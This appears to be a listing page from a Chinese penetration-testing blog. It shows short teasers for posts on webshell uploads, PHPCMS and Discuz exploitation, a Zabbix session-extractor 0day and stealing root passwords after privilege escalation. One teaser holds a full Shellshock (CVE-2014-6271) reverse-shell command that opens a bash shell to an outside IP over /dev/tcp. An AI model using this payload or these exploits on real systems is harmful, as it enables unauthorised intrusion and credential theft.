记一次aspx+KindEditor上传 拿webshell 作者:mOon 博客:www.mooonsec.com 0x01:前言
11月21日2,355 views评论webshell
上传
暗月ECSHOP综合利用工具
CVE-2014-6271反弹shell
curl -A "() { :;}; /bin/bash -i >& /dev/tcp/61.51.xx.xx/8080 0>&1" http...
11月21日moonsec_com439 views评论curl
xx
PHPCMS后台低权限拿SHELL
PHPCMS 后台低权限拿SHELL 前提是需要有管理专题的权限 测试版本 PHPCMS 程序版本:Phpcms V9 .5.6 Release 20140522 过程 1. 添加...
11月21日585 views评论test
权限
XSS漏洞扫描器 – Xelenium
XSS漏洞扫描器 – Xelenium elenium是由owasp出品的一款安全测试工具,使用Java Swing编写,可以用来发现web应用中存在的安全漏洞 。 当前版本可以发...
11月21日moonsec_com895 views评论xss
漏洞
渗透用的Python小脚本
0x00 渗透的很多时候,找到的工具并不适用,自己码代码才是王道,下面三个程序都是渗透时在网络上找不到合适工具,自己辛苦开发的,短小使用,求欣赏,求好评。
11月21日moonsec_com362 views评论python
root
阿里峰会议题pdf分享
告诉你们我是用意念在日站(渗透实战)
Zabbix 2.0.1 Session Extractor 0day
#!/usr/bin/python import re import sys,urllib2,urllib print "/n[*] Zabbix 2.0.1 Session Extractor 0d...
11月21日moonsec_com359 views评论print
session
DZ论坛最新注入漏洞利用工具(获取uckey和帐号密码)
DZ论坛最新注入漏洞利用工具 (获取uckey和帐号密码) DZ论坛最新注入漏洞利用工具(获取uckey和帐号密码)解压码:www.moonsec.com.rar
11月21日2,494 views评论漏洞
获取
提权后获取linux root密码
在webbackdoor本身是root (可能性小的可怜)或通过某漏洞 溢出成功得到最高权限后,如果能获取root密码能给我们带来很多的好处。查询了一下前辈的方法,一个是欺骗su记...
11月21日moonsec_com526 views评论root
密码
Windows+Apache+Python配置简略,2011完整无错版
哥们倒腾了四五年的PHP以后,面对日益严重的桌面软件需求,终于下定决心要开始Python的学习之路了。 去年学了C#的半本书,无奈其较高的学习门槛和跨平台缺陷,最终还是转向了Python,估且算是俺的...
11月21日moonsec_com313 views评论php
python
68